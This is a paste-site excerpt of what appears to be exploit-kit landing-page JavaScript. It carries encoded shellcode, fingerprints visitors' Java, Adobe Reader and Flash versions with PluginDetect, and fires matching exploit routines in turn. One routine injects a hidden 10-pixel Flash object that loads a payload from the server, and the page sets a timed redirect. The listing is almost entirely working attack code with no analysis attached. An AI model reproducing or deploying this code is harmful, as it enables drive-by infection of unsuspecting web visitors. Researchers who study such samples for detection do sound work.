  1793. 170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%
  1794. c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%
  1795. 2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%
  1796. 05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%
  1797. 7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%
  1798. b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%df08!%9e0a!%6618!%139c!%0185!%
  1799. cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
  1800.   return a["replace"](/\%!/g, "%" + "u")
  1801. }
  1802. ;
  1803. function ff2(){
  1804.   var oSpan = document.createElement("span");
  1805.   var url = "/assumed/timing_borrows.php?nsxojsu=" + x("c833f") + "&uflnpv=" + x("gczh") + "&qtpzz=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&nyt=clxndipk";
  1806.   oSpan.innerHTML = "
  1807. <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
  1808. '><param name='movie' value='" + url + "
  1809. ' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
  1810. src='" + url + "
  1811. ' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
  1812. ' width='10' height='10'></embed></object>";
  1813.   document.body.appendChild(oSpan);
  1814. }
  1815. document.write('');
  1816. setTimeout(end_redirect, 61000);
  1817. var pdfver = [];
  1818. function svwrbew6436b($){
  1819.   var ar = [];
  1820.   var javax = ($.getVersion("Ja" + "va") + ".").toString()["split"](".");
  1821.   if ($.isMinVersion("Ja" + "va") >= 0 && ((javax[0] == 1 && javax[1] == 7 && javax[3] < 9
  1822.   ))){
  1823.     ar["push"](j2);
  1824.   }
  1825.   else if ($.isMinVersion("Ja" + "va") >= 0 && ((javax[0] == 1 && javax[1] == 6 && javax[3
  1826.   ] < 33) || (javax[0] == 1 && javax[1] < 6))){
  1827.     ar["push"](j1);
  1828.   }
  1829.   pdfver = PluginDetect.getVersion("AdobeReader");
  1830.   if (window.document)if (typeof pdfver == "string"){
  1831.     pdfver = pdfver["split"](".")
  1832.   }
  1833.   else {
  1834.     pdfver = [0, 0, 0, 0]
  1835.   }
  1836.   if (pdfver[0] > 0 && pdfver[0] < 8){
  1837.     if (window.document)ar["push"](p1);
  1838.   }
  1839.   if (window.document && (pdfver[0] == 8 || (pdfver[0] == 9 && pdfver[1] < 4))){
  1840.     ar["push"](p2);
  1841.   }
  1842.   var ver = ($$.getVersion("Flash") + ".").toString()["split"](".");
  1843.   if (((ver[0] == 10 && ver[1] == 0 && ver[2] > 40) || (window.document && (ver[0] == 10 &&
  1844.   ver[1] > 0) && (ver[0] == 10 && ver[1] < 2))) || window.document && ((ver[0] == 10 &&
  1845.   ver[1] == 2 && ver[2] < 159) || (ver[0] == 10 && ver[1] < 2))){
  1846.     ar["push"](ff2);
  1847.   }
  1848.   if ((ver[0] == 10 && ver[1] == 3 && ver[2] == 181 && ver[3] <= 23) || (ver[0] == 10 &&
  1849.   ver[1] == 3 && ver[2] < 181)){
  1850.     ar["push"](f1);
  1851.   }
  1852.   var arcalli = 0;
  1853.   var arcall = function (){
  1854.     if (ar.length <= arcalli)return 123;
  1855.     ss = setTimeout;
  1856.     var res = ar[arcalli]();
  1857.     arcalli++;
  1858.     if (res && window.document){
  1859.       ss(function (){
  1860.         arcall()
  1861.       }
  1862.       , 5509);
  1863.     }
  1864.     else {
  1865.       arcall();
  1866.     }
  1867.   }
  1868.   ;
  1869.   arcall();
  1870. }
  1871. $$["onDetec" + "tionDone"]("Ja" + "va", svwrbew6436b, "../broke/getJavaInfo.jar");
Add Comment
Please, Sign In to add comment